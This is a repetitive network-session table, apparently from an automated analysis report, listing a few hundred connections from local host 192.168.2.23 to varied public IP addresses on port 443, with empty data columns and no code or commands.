                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11076192.168.2.2355500154.104.193.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11077192.168.2.235340267.91.252.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11078192.168.2.2353656196.108.202.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11079192.168.2.2334710167.111.112.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11080192.168.2.235442270.39.136.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11081192.168.2.2339524196.40.97.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11082192.168.2.2337304101.158.65.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11083192.168.2.235883846.43.84.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11084192.168.2.2355784217.196.84.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11085192.168.2.2340624196.218.27.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11086192.168.2.2358266199.107.146.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11087192.168.2.2337892144.139.147.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11088192.168.2.2348220155.81.45.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11089192.168.2.23519324.57.36.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11090192.168.2.2345264200.184.71.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11091192.168.2.2333116206.40.35.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11092192.168.2.234098279.76.162.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11093192.168.2.2345298155.70.105.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11094192.168.2.235692677.26.35.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11095192.168.2.2356244104.112.48.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11096192.168.2.2357944111.182.14.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11097192.168.2.2338202113.223.102.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11098192.168.2.2336042165.59.12.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11099192.168.2.2343356200.118.61.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11100192.168.2.235237690.53.71.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11101192.168.2.2350570117.167.184.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11102192.168.2.23439302.125.166.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11103192.168.2.233798298.210.41.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11104192.168.2.2348762139.254.52.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11105192.168.2.2340648105.235.238.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11106192.168.2.2336590182.232.209.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11107192.168.2.233802299.152.7.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11108192.168.2.2342082142.22.34.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11109192.168.2.2359184163.224.149.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11110192.168.2.2352970125.218.101.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11111192.168.2.2342510106.61.233.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11112192.168.2.2348334209.198.119.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11113192.168.2.234003886.35.130.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11114192.168.2.234597893.126.28.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11115192.168.2.2344966203.8.142.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11116192.168.2.2339656207.154.94.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11117192.168.2.2355084113.236.185.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11118192.168.2.2335086196.85.183.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11119192.168.2.235025063.131.52.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11120192.168.2.23443604.6.143.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11121192.168.2.236004289.129.250.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11122192.168.2.234995269.255.2.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11123192.168.2.234888680.184.148.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11124192.168.2.233718650.141.141.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11125192.168.2.2358980134.178.223.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11126192.168.2.235950260.149.141.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11127192.168.2.235575298.174.2.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11128192.168.2.2335102157.43.252.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11129192.168.2.235124049.42.158.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11130192.168.2.233983696.191.196.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11131192.168.2.2345092150.49.76.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11132192.168.2.2359014108.92.10.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11133192.168.2.235614066.200.92.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11134192.168.2.2353452204.70.164.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11135192.168.2.233993690.145.183.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11136192.168.2.2337078144.174.155.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11137192.168.2.235628882.26.193.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11138192.168.2.2354752132.119.31.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11139192.168.2.235593690.64.192.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11140192.168.2.2344796223.103.174.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11141192.168.2.2349976155.1.5.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11142192.168.2.235810025.173.68.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11143192.168.2.235769064.127.156.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11144192.168.2.233499631.92.210.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11145192.168.2.23504129.81.129.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11146192.168.2.2360302199.208.247.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11147192.168.2.2360014184.122.35.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11148192.168.2.2360702210.62.177.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11149192.168.2.2347884185.129.103.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11150192.168.2.233646860.115.174.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11151192.168.2.233563263.148.167.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11152192.168.2.2358164217.42.95.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11153192.168.2.235280468.205.167.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11154192.168.2.2341316176.113.244.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11155192.168.2.235573496.79.235.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11156192.168.2.23414884.235.119.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11157192.168.2.233298454.148.86.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11158192.168.2.234745491.107.64.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11159192.168.2.2355924202.255.172.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11160192.168.2.233690825.144.255.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11161192.168.2.2348336104.201.72.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11162192.168.2.2333108159.4.65.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11163192.168.2.235757862.119.1.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11164192.168.2.234488885.171.229.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11165192.168.2.2347658125.46.222.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11166192.168.2.2338596114.55.162.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11167192.168.2.235902041.159.176.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11168192.168.2.2344510157.93.234.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11169192.168.2.2358044209.32.101.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11170192.168.2.2358092160.96.207.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11171192.168.2.2353942223.216.61.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11172192.168.2.235548445.58.218.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11173192.168.2.2360110149.56.61.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11174192.168.2.2343570219.58.224.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11175192.168.2.234284675.112.172.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11176192.168.2.2356426210.50.129.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11177192.168.2.235475863.243.11.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11178192.168.2.2342410143.136.26.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11179192.168.2.2347224223.106.167.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11180192.168.2.2342358105.103.71.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11181192.168.2.2358858119.157.227.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11182192.168.2.234936071.89.178.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11183192.168.2.234566678.220.197.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11184192.168.2.233578280.33.213.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11185192.168.2.2333100197.188.116.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11186192.168.2.2343156184.163.184.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11187192.168.2.2349564170.222.142.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11188192.168.2.2335664139.9.169.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11189192.168.2.2340636221.195.182.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11190192.168.2.235923691.223.102.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11191192.168.2.234859437.61.38.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192192.168.2.2345336118.27.203.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11193192.168.2.2358310200.108.182.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11194192.168.2.2343962207.131.87.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11195192.168.2.236039432.98.169.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11196192.168.2.2347180208.247.151.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11197192.168.2.233960069.75.242.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11198192.168.2.235985697.99.245.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11199192.168.2.2349940207.139.12.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11200192.168.2.235542497.254.9.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11201192.168.2.2358806206.87.122.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11202192.168.2.2338226167.120.126.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11203192.168.2.2351274139.223.19.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11204192.168.2.233555214.191.218.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11205192.168.2.2357512206.208.173.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11206192.168.2.2355826119.143.107.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11207192.168.2.2347540115.225.25.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11208192.168.2.23353925.32.228.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11209192.168.2.233479237.111.133.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11210192.168.2.2335980201.132.101.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11211192.168.2.234234066.85.156.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11212192.168.2.235625642.90.74.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11213192.168.2.234134657.124.4.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11214192.168.2.233559051.108.24.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11215192.168.2.2339876145.206.81.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11216192.168.2.2342734100.9.27.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11217192.168.2.2352008100.26.56.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11218192.168.2.234500285.12.223.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11219192.168.2.2342558125.151.122.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11220192.168.2.2350098120.242.113.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11221192.168.2.2356412212.203.12.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11222192.168.2.234956480.252.126.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11223192.168.2.2350932134.38.109.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11224192.168.2.2351244153.37.6.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11225192.168.2.2341124106.101.137.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11226192.168.2.2340946218.225.215.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11227192.168.2.234035298.69.127.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11228192.168.2.234221698.161.154.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11229192.168.2.233575035.135.204.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11230192.168.2.233695861.254.24.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11231192.168.2.2332862153.252.57.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11232192.168.2.23414082.15.81.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11233192.168.2.234265241.210.133.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11234192.168.2.2350086140.11.252.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11235192.168.2.236016025.157.127.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11236192.168.2.2338064129.127.104.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11237192.168.2.2349510176.242.137.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11238192.168.2.234170061.240.227.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11239192.168.2.234405283.64.190.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11240192.168.2.235552840.14.20.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11241192.168.2.234845295.239.234.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11242192.168.2.2337088194.32.100.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11243192.168.2.235417096.254.121.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11244192.168.2.2350090164.215.142.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11245192.168.2.2351232209.160.147.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11246192.168.2.2351580162.46.99.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11247192.168.2.2354534181.37.157.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11248192.168.2.234119499.191.52.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11249192.168.2.234356691.98.75.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11250192.168.2.235890060.253.100.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11251192.168.2.2360704204.250.200.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11252192.168.2.2335948195.223.89.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11253192.168.2.2342196104.127.105.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11254192.168.2.2354472162.28.162.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11255192.168.2.2346064220.12.94.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11256192.168.2.2348738165.48.23.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11257192.168.2.235250493.248.142.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11258192.168.2.2341718131.135.21.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11259192.168.2.233374019.183.20.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11260192.168.2.236040434.66.188.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11261192.168.2.2343348178.255.93.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11262192.168.2.234553631.231.9.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11263192.168.2.2333548161.118.100.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11264192.168.2.2345220200.173.173.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11265192.168.2.2357574213.58.16.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11266192.168.2.2349716187.221.245.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11267192.168.2.2346786114.103.243.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11268192.168.2.235955093.41.210.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11269192.168.2.234022245.161.166.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11270192.168.2.2349186210.125.141.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11271192.168.2.2359960103.58.29.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11272192.168.2.2347140117.8.190.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11273192.168.2.235058041.41.92.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11274192.168.2.2339480147.86.11.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11275192.168.2.234625823.224.198.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11276192.168.2.2338536119.255.235.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11277192.168.2.23375308.144.111.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11278192.168.2.235352474.95.97.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11279192.168.2.234780683.166.37.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11280192.168.2.2336148205.92.42.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11281192.168.2.2352852117.224.3.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11282192.168.2.233948860.50.40.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11283192.168.2.2348808134.221.185.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11284192.168.2.236098282.134.3.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11285192.168.2.2336552204.179.90.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11286192.168.2.233683685.237.82.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11287192.168.2.2340562172.113.93.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11288192.168.2.2353258163.52.203.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11289192.168.2.2355240117.41.115.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11290192.168.2.2338986149.2.245.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11291192.168.2.23455648.166.8.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11292192.168.2.2343468120.169.168.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11293192.168.2.2351608220.129.1.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11294192.168.2.2350500138.33.177.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11295192.168.2.2350298187.202.234.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11296192.168.2.2354682125.63.66.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
